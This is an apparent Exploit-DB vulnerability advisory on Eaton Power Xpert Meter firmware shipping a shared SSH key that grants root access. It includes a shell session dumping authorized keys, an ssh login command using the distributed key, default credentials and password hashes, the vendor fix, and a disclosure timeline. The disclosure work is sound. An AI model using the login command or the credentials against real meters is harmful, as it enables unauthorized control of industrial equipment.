# Exploit Title: Eaton Xpert Meter SSH Private Key Exposure
# Date: 07-16-2018
# Exploit Author: BrianWGray
# Contact:
# WebPage: https://CTRLu.net/
# Vendor Homepage: http://www.eaton.com/
# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
# Version: Firmware <= 12.x and <= 13.3.x.x and below
# Recommended to update to Version 13.4.0.10 or above
# Tested on: Firmware 12.1.9.1 and 13.3.2.10
# CVE : CVE-2018-16158
# EDB-ID: EDB-ID: 45283
Eaton Xpert Meter SSH Private Key Exposure
1. Description
Eaton Power Xpert Meters are used across industries for energy management,
monitoring circuit loading, and identifying power quality problems.
Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with
a public/private key pair on Power Xpert Meter hardware that allows
passwordless authentication to any other affected Power Xpert Meter.
The vendor recommends updating to Version 13.4.0.10 or above. As the key is
easily retrievable, an attacker can use it to gain unauthorized remote
access as uid0
2. Proof of Concept
https://github.com/BrianWGray/msf/blob/master/exploits/linux/ssh/eaton_known_privkey.rb
https://github.com/BrianWGray/msf/blob/master/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
Nexpose scanner checks
https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey.xml
https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey.vck
https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey-workaround.sol
# pwd
/home/admin/.ssh
# ls -lah
drwxr-xr-x 2 root root 160 Dec 31 1969 .
drwxr-xr-x 3 root root 60 Jul 9 05:21 ..
-rw------- 1 root root 859 Dec 31 1969 authorized_keys
-rw------- 1 root root 668 Dec 31 1969 id_dsa
-rw-r--r-- 1 root root 623 Dec 31 1969 id_dsa.pub
-rw------- 1 root root 887 Dec 31 1969 id_rsa
-rw-r--r-- 1 root root 236 Dec 31 1969 id_rsa.pub
-rw-r--r-- 1 root root 0 Dec 31 1969 known_hosts
# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwteQhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPHj/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain
ssh-dss AAAAB3NzaC1kc3MAAACBAN6PHKCtekFnZ9F2qROXjCPwYk7ubA87NLC8zHSQJKkLaPEjtMD+t63TLbezpX2yeyt2erFjrsMDr0xfeXoumOb/zzowJzMKkShDs1zZZqO0AOpW6IyLVf/g1mprpTTXAJUUSrMRffVYyvfnqK7mdHqqzMoGnNEBNsXbRSu5kbulAAAAFQCmLpGNlshC916TJpgXuag7vooB9wAAAIBa3VxVvd7gYoIzWrfQvV3m9NzjgVsi1oTJcetHwx2+195pY1HfbnpXdNuXG5pJJLbAkizun51cq4v5+RZCnJLkiqNk2wlmcHwt3V6n+hGzf1gBoO+u8rRZobsv/uwt0rIUBnMOD2nCderT0KYtcix35or+DPsZOJTL2TWKOyJCAQAAAIAZOpFizZezK0XFSC8loPPGSwSFZFs8bShtukXhkBzfCSSrtnfcHQ2fxCAHYY2LgtHrN+hG0Y7095ALo3RsU+seN2Xci7xcTRpY8eV9J2MCPjEwrmNsTSbPCRVlV+G2bvGz8OTzE4OnRd+Whs5UG/2yM/i509LvtxYfuwABOqM7pg== adam@pxmeterbuild.nasa.ad.etn.com
# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwteQhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPHj/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwteQhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPHj/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain
Using the private key distributed with the meters has been tested across multiple Power Xpert Meters to successfully authenticate as any user account created on the devices due to profile configurations.
ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa admin@hostname
Once logged into the device, there are a myriad of issues ranging from hashes being stored in /etc/passwd file permissions, exploitable services, weak crypto algorithms etc.
observed local credentials
ADMIN:ADMIN
admin:0wyDB0cXWCYDg:17619:0:99999:7::: - powernet
root:$1$OXHFmWqL$6cdSUjFXqvS1PHFyqxtZQ0:0:0:root:/root:/bin/sh - wipro
3. Solution:
A new version of this firmware already exists for meters with firmware versions 13.x and above. Eaton recommends all customers using the products above to install the newest firmware. Please download the latest firmware (Version 13.4.0.10) from the product portal.
In the future, as new firmware is made available for the Power Xpert Meter 4000/6000/8000, Eaton recommends that customers upgrade to the latest available release of firmware.
Power Xpert Meters 4000/6000/8000 with firmware version 12 and below were manufactured before September 2010 and are considered an end-of-life hardware platform. These older meters should be replaced with new Power Xpert Meters 4000/6000/8000.
4. Timeline:
* 07-16-2018: Discovered and validated
* 07-17-2018: Metasploit module generated for simple scanning and testing
* 07-18-2018: Vendor Notified via CybersecurityCoE@eaton.com at 1:06PM Eastern time
* 07-19-2018: Vendor initial response recognizing the submission 8:08AM Eastern time
* 07-20-2018: Submitted information to Cert.org
* 07-20-2018: Cert/CC declined involvement as long as Eaton was responding.
* 07-25-2018: Vendor responds with "If you upgrade to the latest version, you should not see them anymore."
* 07-25-2018: Question sent to Vendor - "As the issue has already been resolved is there any request for a wait period prior to publishing public vulnerability checks to allow other organizations to scan for this issue?"
* 07-25-2018: Vendor response - "Give us a few days. We are, in parallel, working on a communication for our customers too. As soon as we publish it, you could go ahead and release the information also. I will come back to you very soon."
* 08-08-2018: Update request sent to vendor - "Has an acceptable release date been set?
Is it known which products and firmware versions are impacted to allow for accurate remediation information to be provided?"
* 08-13-2018: Vendor response - "We are preparing an advisory. This is very old firmware (2010) and hence the delay. I should be able to come back to you in 10 days once the advisory is formalized. You should then be able to release the information. I hope this is OK."
* 08-13-2018: Confirmation sent to vendor that the wait time has been accepted.
* 08-28-2018: "We have now put up an advisory from our end: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf . You can go ahead and publish the vulnerabilities. Firmware version 13.x and above are upgradable. Unfortunately, version 12.x and below are end-of-life and can not be upgraded."
* 08-29-2018: Submitted to MITRE for a CVE 9:23pm, CVE-2018-16158 assigned within 3 hours.